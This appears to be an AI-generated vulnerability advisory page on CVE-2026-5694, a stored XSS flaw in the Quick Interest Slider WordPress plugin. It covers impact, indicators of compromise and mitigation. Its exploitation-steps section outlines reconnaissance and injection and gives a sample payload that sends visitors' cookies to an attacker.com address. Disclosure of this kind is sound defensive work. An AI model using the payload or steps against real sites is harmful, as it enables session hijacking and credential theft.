CVE-2026-5694
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-5694 is a Stored Cross-Site Scripting (XSS) vulnerability in the Quick Interest Slider plugin for WordPress, affecting all versions up to and including 3.1.5. The flaw exists in the loan-amount and loan-period parameters due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject persistent malicious scripts into pages. It was published on April 15, 2026, with a patch identified as of April 22, 2026. The vulnerability carries a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory, Wordfence).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), where user-supplied values in the loan-amount and loan-period parameters are neither sanitized on input nor properly escaped on output before being rendered in page content. Because the plugin fails to validate or encode these parameters, an unauthenticated attacker can submit crafted HTTP requests containing arbitrary JavaScript payloads that are stored server-side and subsequently executed in any visitor's browser. The vulnerable code paths are visible in the plugin source at lines 1335 and 1338 of quick-interest-slider.php version 3.1.5 (GitHub Advisory, Wordfence).

Impact

Successful exploitation allows unauthenticated attackers to persistently inject arbitrary JavaScript into WordPress pages, which executes in the browsers of all subsequent visitors without any further attacker interaction. This can lead to session hijacking, credential theft, malware distribution to site visitors, or defacement of website content. The scope is marked as "Changed" in the CVSS vector, indicating that the impact extends beyond the vulnerable plugin itself to affect end users of the WordPress site (GitHub Advisory, Wordfence).

Exploitability

There is no public proof-of-concept exploit code and no evidence of active in-the-wild exploitation at this time. The vulnerability requires no authentication and no user interaction to inject the payload, making it trivially exploitable by any network-accessible attacker against sites running the affected plugin versions. The EPSS score is approximately 0.061% (0.000610), indicating a low current probability of exploitation within the next 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog (GitHub Advisory, Wordfence).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites using the Quick Interest Slider plugin (versions ≤ 3.1.5) via search engines, Wappalyzer, or WordPress plugin enumeration tools targeting pages that render the loan calculator widget.
  2. Identify vulnerable parameters: Locate pages where the plugin renders the interest slider and confirm the loan-amount and loan-period input parameters are present in the page or form submission.
  3. Craft malicious payload: Prepare a stored XSS payload, e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>, to be injected via the vulnerable parameters.
  4. Submit the payload: Send an HTTP request (e.g., via a form submission or direct POST) to the plugin endpoint with the crafted payload in the loan-amount or loan-period parameter. No authentication is required.
  5. Payload persistence: The injected script is stored server-side by the plugin and rendered unsanitized on the affected page.
  6. Victim execution: Any user who visits the injected page will have the malicious script execute in their browser, enabling session hijacking, credential theft, or further attacks (GitHub Advisory, Wordfence).

Indicators of compromise

  • Network: Unusual POST or GET requests to WordPress pages hosting the Quick Interest Slider widget containing script tags or encoded JavaScript in loan-amount or loan-period parameters; outbound requests from visitor browsers to unknown external domains (potential exfiltration endpoints).
  • Logs: WordPress or web server access logs showing requests with <script>, javascript:, or URL-encoded equivalents (%3Cscript%3E) in loan-amount or loan-period query/body parameters.
  • File System / Database: WordPress database (wp_posts, wp_options, or plugin-specific tables) containing unexpected <script> tags or JavaScript URIs in fields associated with the Quick Interest Slider plugin.
  • Browser/User Reports: End users reporting unexpected redirects, pop-ups, or browser warnings when visiting pages that use the Quick Interest Slider widget.

Mitigation and workarounds

Site administrators should immediately upgrade the Quick Interest Slider plugin to a version newer than 3.1.5, as a patch was made available on April 22, 2026. If immediate patching is not possible, implement Web Application Firewall (WAF) rules to filter and block malicious input targeting the loan-amount and loan-period parameters. After patching, conduct a security audit of the WordPress database to identify and remove any previously injected malicious scripts. Monitor pages using the plugin for unauthorized modifications or suspicious content (GitHub Advisory, Wordfence).

Community reactions

Wordfence, which discovered and reported the vulnerability, included it in their weekly WordPress vulnerability report for April 13–19, 2026, and published threat intelligence details on their platform. RedPacket Security flagged the CVE via social media (Mastodon) and their blog shortly after disclosure. Community coverage has been limited to automated CVE alert aggregators and security feeds, with no notable independent researcher commentary or broader media coverage identified (Wordfence Blog, RedPacket Security).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-18039NONEN/A
  • essential-addons-for-elementor-lite
NoYesAug 14, 2026
CVE-2026-16810NONEN/A
  • bit-form
NoYesAug 14, 2026
CVE-2026-16739NONEN/A
  • epeken-all-kurir
NoNoAug 14, 2026
CVE-2026-15205NONEN/A
  • paymob-for-woocommerce
NoYesAug 14, 2026
CVE-2026-14290NONEN/A
  • embed-google-photos-album-easily
NoNoAug 14, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management